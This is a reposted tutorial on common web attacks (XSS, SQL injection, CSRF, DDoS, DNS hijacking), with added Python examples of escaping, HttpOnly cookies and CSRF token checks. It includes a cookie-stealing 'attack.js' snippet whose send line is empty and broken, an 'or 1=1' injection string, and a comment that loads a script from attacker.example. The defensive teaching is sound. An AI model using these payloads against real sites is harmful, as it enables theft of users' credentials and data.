XSS attacks, SQL injection, CSRF attacks, DDOS attacks and DNS hijacking

This article explains common network attack methods: XSS attacks, SQL injection, CSRF attacks, DDOS attacks and DNS hijacking.

XSS Attack

XSS stands for Cross-Site Scripting.

To distinguish it from Cascading Style Sheets (CSS), the abbreviation was changed to XSS.

In an XSS attack, the attacker tampers with a web page by injecting malicious HTML or script, usually JavaScript. When users browse the page, the injected script runs and controls the user's browser to perform malicious actions.

XSS attacks are often used against forums, blogs and similar applications. Attackers can steal users' cookies, passwords and other important data, and then forge transactions, steal user property, and steal intelligence and other private information.

As in the picture above, if a user enters a JavaScript script in the comment box instead of normal text, and the backend stores the input in the database without processing it, then when other users visit this page their browsers will execute the script.

Of course, this is just a prank. Real attackers are not satisfied with pranks; they may want to obtain your personal information through these injected scripts, even your account password and other information.

As the picture above shows, the user actually included a third-party script when commenting. This script reads your browser's cookie information and sends it to a specified interface for saving and processing. In this way, your information is leaked.

// Logic in attack.js
var uname = $.cookie('username'); // Get account
var pwd = $.cookie('password'); // Get password

// send request
$('body').appendTo('');

In the logic above, the script obtains your personal information and sends it to a back-end PHP file for processing and storage. Your personal information has then been leaked, which is why preventing XSS attacks is so important in network security.

Therefore, the backend should never trust data submitted by the user. When it receives user-submitted information, it must sanitize it.

That is, filter special characters such as < and > used in JavaScript scripts: escape them before storing the data. This effectively prevents XSS attacks.

In addition, if the HttpOnly attribute is set on a cookie, the cookie cannot be read by JavaScript, which also effectively prevents XSS attacks from stealing cookie content.
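
The two defenses above (escaping < and > and setting HttpOnly), shown as an added example that is not part of the original article. The comment text, the `attacker.example` host, the cookie name `session` and the `Secure` attribute are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample: a comment that carries a script tag instead of text.
STORED_COMMENT = '<script src="https://attacker.example/attack.js"></script>'


def render_unsafe(comment: str) -> str:
    """What the article describes: stored input is echoed back unchanged."""
    return '<div class="comment">' + comment + "</div>"


def render_escaped(comment: str) -> str:
    """Escape & < > " ' on output so the comment is shown as text."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


class _Tags(HTMLParser):
    """Records the element names an HTML parser sees in a fragment."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append(tag)


def tags_in(markup: str) -> list:
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.seen


def session_cookie(session_id: str) -> str:
    """Set-Cookie value for a session cookie that scripts cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True  # not exposed to document.cookie
    cookie["session"]["secure"] = True    # only sent over HTTPS
    return cookie["session"].OutputString()


if __name__ == "__main__":
    print(tags_in(render_unsafe(STORED_COMMENT)))   # script element present
    print(tags_in(render_escaped(STORED_COMMENT)))  # only the wrapper div
    print("Set-Cookie:", session_cookie("constructed-session-id"))
```
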

SQL injection

In an SQL injection attack, the attacker injects malicious SQL into an HTTP request. The server uses the request parameters to construct a database SQL command, so the malicious SQL is built into the command and executed in the database, in order to obtain interesting data or to perform sensitive operations such as reading, modifying, deleting and inserting. This results in data being tampered with at will.

However, SQL injection attacks require the attacker to have some knowledge of the database tables. For example, your project may be open source and you may have accidentally disclosed the database account and password. In addition, if the website goes online without debugging mode turned off, interested people can guess the table structure from the website's error output. Finally, there is blind injection, in which the attacker blindly guesses the table structure, but this is the most difficult.

SQL injection can be prevented through pre-compilation. Binding parameters is the best way to prevent SQL injection. Nowadays, popular frameworks basically all implement SQL pre-compilation and parameter binding. Malicious SQL is then treated as a parameter of the SQL statement instead of being executed as an SQL command.

# SQL to obtain user information normally
select * from users where id=1

# If 1 or 1=1 is injected into sql, all data in the user table can be found, leading to data leakage.
select * from users where id=1 or 1=1

CSRF attacks

CSRF stands for Cross-Site Request Forgery. Attackers use cross-site requests to perform illegal operations as a legitimate user, such as transferring money or posting comments. At its core, it abuses the browser's cookie or the server's session policy to steal the user's identity.

While Website A is open, the user opens the malicious Website B in another tab. The page on B, with malicious intent, makes the browser initiate an HTTP request to Website A.

Because Website A was opened earlier, the browser has stored the cookie or other information used to authenticate with Website A. The malicious request automatically carries this information, which leads to identity hijacking and produces results the user did not intend.

The defense strategies against CSRF attacks include form tokens, verification codes, Referer checks, etc.
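
A sketch of the form token and Referer checks listed above, as an added example that is not part of the original article. `SERVER_KEY`, the `https://a.example` origin standing in for Website A, the `csrf_token` field name and the choice to reject requests without a Referer are all assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)   # assumption: secret known only to Website A
TRUSTED_ORIGIN = "https://a.example"   # assumption: stands in for Website A


def issue_token(session_id: str) -> str:
    """Token that A embeds in its own forms; B cannot compute it without the key."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def referer_ok(referer) -> bool:
    """Referer detection: the request must originate from one of A's own pages."""
    if not referer:
        return False  # assumption: a missing Referer is treated as untrusted
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def accept_post(session_id: str, form: dict, headers: dict) -> bool:
    """Accept a state-changing request only if token and Referer both check out.

    The session cookie alone is not enough: the browser attaches it to
    requests triggered from Website B as well.
    """
    submitted = form.get("csrf_token", "")
    expected = issue_token(session_id)
    # compare_digest does not leak the position of the first mismatch.
    token_ok = hmac.compare_digest(submitted.encode(), expected.encode())
    return token_ok and referer_ok(headers.get("Referer"))


if __name__ == "__main__":
    sid = "constructed-session-id"
    own_form = {"amount": "10", "csrf_token": issue_token(sid)}
    print(accept_post(sid, own_form, {"Referer": "https://a.example/transfer"}))
    print(accept_post(sid, {"amount": "10"}, {"Referer": "https://b.example/"}))
```
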

DDOS Attack

DDOS stands for Distributed Denial of Service. It is an upgraded version of the denial-of-service (DoS) attack. A denial-of-service attack means that your service can no longer serve users normally.

In the early days it was very easy to launch a DoS attack. You only needed to write a program that overloaded the service so that it had no capacity left to serve normal requests. That is, requesting the service many times per second would exhaust the target server's memory.

Later, as technology developed, servers became distributed, and no single server provides a service. Behind one service there are countless CDN nodes and countless web servers. Trying to attack this kind of distributed network with a single server is like throwing an egg at a rock, and many DDOS attacks are not free nowadays, so the attempt can easily backfire on the attacker.

Defense methods: with today's technology it is not possible to completely prevent such attacks; they can only be mitigated. Mitigation techniques include traffic cleaning, SYN cookies, etc.

DNS Hijacking

In today's Internet traffic, the traffic generated by Web services, mainly HTTP/HTTPS, accounts for the vast majority.

Web services are developing rapidly, and an unsung contributor behind them is the domain name resolution system. DNS provides the service of converting domain names into IP addresses. Every domain name resolution must go through DNS, which shows how important it is.

Precisely because of its importance, DNS hijacking can easily be exploited by people with ulterior motives.

In the early days, security was not considered too much, so DNS was easily hijacked.

If an attacker tampers with the DNS resolution settings and points a domain name from its normal IP to an illegal IP controlled by the attacker, then when we access the domain name we reach not the corresponding website but a fake website or one with ulterior motives. This attack method is DNS hijacking.

You can also install an SSL certificate. The SSL certificate authenticates the server's identity, so connection errors caused by DNS hijacking can be discovered and the connection terminated in a timely manner.

Reposted from: Understanding XSS attacks, SQL injection, CSRF attacks, DDOS attacks and DNS hijacking in one article – Zhihu
